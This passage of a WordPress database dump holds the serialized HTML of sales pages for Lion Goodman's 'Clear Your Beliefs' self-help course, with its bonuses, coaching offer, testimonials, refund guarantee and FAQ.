belief at a time.\n\nYou''ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\n\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you''ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 7, you will:</strong>\n<ul>\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\n</ul>\n</div>\n</div>\n<!--[wpfcNOT]-->\n\n&nbsp;\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\nIn addition to these seven transformational sessions, you''ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\n\n&nbsp;\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can''t seem to stop hurting each other. What''s going on?\n\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)\n\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We''re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\n\nLearn how to determine your own (and your partner''s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI''s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you''ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\n<div class="module_body">\n\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You''ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world''s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.\n\n</div>\n<div class="module_body">\n\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You''ll receive the first two chapters of the book as Bonus #4, below.\n\n</div>\n<div class="module_body">\n\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\n<div class="module_body">\n\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\n<ul style="padding-left: 20px;">\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\n	<li>Learn a process that can strengthen your power of intention</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Change Your Beliefs eBook</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a>\n\n</div>\n<div class="module_body">\n\nYou''ll also receive a copy of Lion''s multimedia eBook, "<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>" \n\nLion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it''s so difficult to change your habitual patterns of thought and behavior. \n\nIt''s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\n\n</div>\n<div class="module_body"></div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\n\n</div>\n</div>\n&nbsp;\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.\n\n<em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\n\nYour coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\n\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\n<h1 id="package"></h1>\n<p style="text-align: right;"><a href="http://clearyourbeliefs.com/program/#top"><font color="#2E2EFE">Up To Top</a></font></p>\n&nbsp;\n<div class="icon_box" style="background: #EFF8FB; width: 500px; margin: 17px auto;">\n<h1>Purchase Today and You''ll Receive:</h1>\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world''s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\n<h3 style="font-size: 20px;">Plus: <em>The Entire BONUS Collection:</em></h3>\n<ul class="icon_box-ul">\n	<li><strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.</li>\n	<li><em><strong>The Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.</li>\n	<li>Your Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong></li>\n	<li><strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\n	<li>Multimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)</li>\n	<li><strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.</li>\n	<li><strong>Optional:</strong> Professional Coaching Sessions.</li>\n</ul>\n<div class="clear"></div>\n&nbsp;\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Register Now</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n\n</div>\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>About Lion Goodman</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\n\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>\n\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\n\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men''s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men''s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\n\n&nbsp;\n\n&nbsp;\n<div class="icon_box">\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n<div class="quot">\n\n<em>"You helped me resolve in a short time issues in my life that I''ve struggled with for years. In addition, I can use the tools you''ve taught me to deal with any difficult circumstance that may appear in the future."</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>– G. J., software developer</strong></div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you''ll grow to love him, as I do."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"Thank you taking me back to the beginning to help me hit the "reset" button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. "</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ''belief-outfits'' are perfect for me, and I''m wearing them with joy and enthusiasm!"</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs."</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n</div>\n<div class="quot">\n\n<em>"I uncovered beliefs I didn''t know I had, including: "<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God."</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"This valuable tool will enhance your life in ways you cannot imagine. It''s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ C.T., Performance and Life Coach</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>– M.M., International Business Consultant</strong></div>\n<div style="text-align: right;"></div>\n</div>\n&nbsp;\n\n</div>\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Register Now</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n\n&nbsp;\n<h1>Frequently Asked Questions</h1>\n\n<div class="parg-text"><p><strong>Q: What is a virtual course?</strong></p></div>\n\n<div class="parg-text"><p>A: It''s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you''ll work by phone or Skype at a time that''s most convenient to you.</p></div>\n\n<div class="parg-text"><p>In addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.</p></div>\n\n<div class="parg-text"><p><strong>Q: How long will I have access to the course?</strong></p></div>\n\n<div class="parg-text"><p>A: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you''ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.</p></div>\n\n<div class="parg-text"><p><strong>Q: Are there scholarships available?</strong></p></div>\n\n<div class="parg-text"><p>A: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to <a href="mailto:info@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">info@clearyourbeliefs.com</a></font>, with a description of your circumstances and your offer of what you can pay.</p></div>\n\n<div class="parg-text"><p><strong>Q: What is your refund policy?</strong></p></div>\n\n<div class="parg-text"><p>A: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">support@clearyourbeliefs.com</a></font>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.</p></div>\n\n<div class="parg-text"><p><strong>Q: How can I reach Customer Support?</strong></p></div>\n\n<div class="parg-text"><p>A: Please send an email to <a href="mailto:support@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">support@clearyourbeliefs.com</a></font>. We''ll get back to you within 48 hours (sometimes longer over weekends).</p></div>\n\n<div class="parg-text"><p><strong>Q: What is your Privacy Policy?</strong></p></div>\n\n<div class="parg-text"><p>A: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" target="_blank" ><FONT COLOR="#2E2EFE">ClearYourBeliefs.com</a></font>, <a href="http://www.BeliefCloset.com" target="_blank" ><FONT COLOR="#2E2EFE">BeliefCloset.com</a></font>, or <a href="http://www.ConfusedAboutLove.com" target="_blank" ><FONT COLOR="#2E2EFE">ConfusedAboutLove.com.</a></font></p></div>\n\n<div class="parg-text"><p>You may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.</p></div>\n\n<div class="parg-text"><p>All information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.</p></div>\n\n<script>// <![CDATA[\njQuery(document).ready(function() {  var is_chrome = window.chrome;   if (is_chrome) {  jQuery(''h5.hdr'').css(''text-size'', ''51px!important'');  jQuery(''h5.hdr'').animate({     fontSize: ''51px''  }, 100);  }  });\njQuery(function(){jQuery(''a[href*=#]:not([href=#])'').click(function() {if (location.pathname.replace(/^//,'''')+''/'' == this.pathname.replace(/^//,'''') && location.hostname == this.hostname){var target = jQuery(this.hash);target = target.length ? target : jQuery(''[name='' + this.hash.slice(1) +'']'');if (target.length){jQuery(''html,body'').animate({scrollTop: target.offset().top}, 1000);return false;}}});});\n// ]]>\n</script>";s:6:"filter";s:1:"1";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:14:"WP_Widget_Text";}}}s:5:"grids";a:2:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:2:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1916, 2214, 'panels_data', 'a:3:{s:7:"widgets";a:1:{i:0;a:4:{s:5:"title";s:0:"";s:4:"text";s:72862:"<center>\n<div class=''embed-container''>\n     <iframe src=''//player.vimeo.com/video/129244809?autoplay=1'' frameborder=''0'' allowfullscreen></iframe>\n</div>\n</center>\n<div class="quot" style="text-align: center; margin: 0px auto ! important;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\nLearn to change your beliefs, and your limitations will disappear.\nYour possibilities will then become unlimited.</strong></span>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\n<div class="clear"></div>\n\n&nbsp;\n\n<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>\n\n&nbsp;\n\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You''re seeking a better life, and you''ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You''ve had some breakthrough experiences and epiphanies. You''ve made progress toward your goals.\n\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\n\n&nbsp;\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their "fixes" tend to wear off over time. After taking their program, you''re revved up, transformed, and ready to go.\n\n<strong>Two weeks later,</strong> you''re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\n&nbsp;\n<h1><center><a class="big button blue" href="http://clearyourbeliefs.com/program/#package" >Okay, I''m convinced!<br />Take me to the program description,<br />tell me about all the cool bonuses I''ll get,<br />and how much it costs...</a><br /></center></h1>\n&nbsp;\n<h1><center><a class="big button blue" href="http://clearyourbeliefs.com/ebook/" target="_blank" >Register for FREE Ebook</a><br /></center></h1>\n&nbsp;\n<h1>Why Does This Happen?</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\n\nNeuroscientists call the brain''s ability to change over time "neuroplasticity."\n\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\n\n&nbsp;\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\n\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\n\n&nbsp;\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" 